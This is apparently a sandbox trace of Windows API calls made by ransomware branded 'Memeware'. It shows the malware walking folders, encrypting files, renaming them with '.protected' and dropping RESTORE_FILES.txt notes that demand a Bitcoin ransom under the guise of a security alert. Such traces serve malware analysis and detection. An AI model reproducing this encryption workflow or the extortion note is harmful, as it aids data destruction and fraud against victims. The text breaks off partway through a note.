-1 [0073.612] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.612] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.612] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\..") returned 85 [0073.612] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.612] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.612] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0073.612] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0073.612] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0073.612] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0073.612] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0073.612] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0073.612] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages") returned 91 [0073.612] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0073.612] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0073.613] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*") returned 93 [0073.613] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0073.613] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.613] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.613] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.613] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.613] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.613] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\.") returned 93 [0073.613] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.613] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0073.613] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.613] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.613] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.613] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.613] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.613] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\..") returned 94 [0073.613] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.613] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.613] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0073.613] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="Windows") returned -1 [0073.613] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="Program Files") returned 1 [0073.613] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="Program Files (x86)") returned 1 [0073.613] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="$Recycle.bin") returned 1 [0073.613] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="System Volume Information") returned 1 [0073.613] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64") returned 117 [0073.613] lstrcmpW (lpString1="vcRuntimeAdditional_amd64", lpString2=".") returned 1 [0073.613] lstrcmpW (lpString1="vcRuntimeAdditional_amd64", lpString2="..") returned 1 [0073.614] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*") returned 119 [0073.614] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0073.614] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.614] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.614] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.614] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.614] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.614] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\.") returned 119 [0073.614] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.614] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0073.614] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.614] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.614] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.614] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.614] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.614] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\..") returned 120 [0073.614] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.614] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.614] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0073.614] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0073.614] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0073.614] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0073.614] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0073.614] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0073.614] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 126 [0073.614] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0073.614] lstrcmpW (lpString1="cab1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0073.614] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0073.614] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0073.614] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0073.616] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 126 [0073.616] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0073.617] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 126 [0073.617] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0073.617] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 126 [0073.617] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0073.617] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0073.618] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.618] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0073.618] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.618] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0073.646] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0073.646] CloseHandle (hObject=0xd8) returned 1 [0073.713] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.protected") returned 136 [0073.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.protected")) returned 1 [0073.713] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0073.713] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="Windows") returned -1 [0073.713] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="Program Files") returned 1 [0073.713] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="Program Files (x86)") returned 1 [0073.713] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="$Recycle.bin") returned 1 [0073.713] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="System Volume Information") returned 1 [0073.713] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 146 [0073.713] StrStrIW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".protected") returned 0x0 [0073.713] lstrcmpW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="RESTORE_FILES.txt") returned 1 [0073.713] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0073.713] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0073.714] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0073.753] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 146 [0073.753] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".txt") returned 0x0 [0073.753] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 146 [0073.753] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".rar") returned 0x0 [0073.753] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 146 [0073.753] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".zip") returned 0x0 [0073.753] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0073.774] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.774] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0073.775] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.775] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0073.775] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0073.776] CloseHandle (hObject=0xd8) returned 1 [0073.776] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.protected") returned 156 [0073.776] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.protected" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.protected")) returned 1 [0073.777] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0073.777] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0073.777] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt") returned 135 [0073.777] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0073.818] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.818] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0073.819] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0073.819] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0073.819] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.819] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0073.819] CloseHandle (hObject=0xd4) returned 1 [0073.820] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0073.820] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0073.820] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 109 [0073.820] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0073.860] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0073.860] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0073.861] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0073.861] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0073.861] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0073.861] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0073.861] CloseHandle (hObject=0xb4) returned 1 [0073.861] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0073.861] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0073.862] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\RESTORE_FILES.txt") returned 100 [0073.862] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0073.862] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, 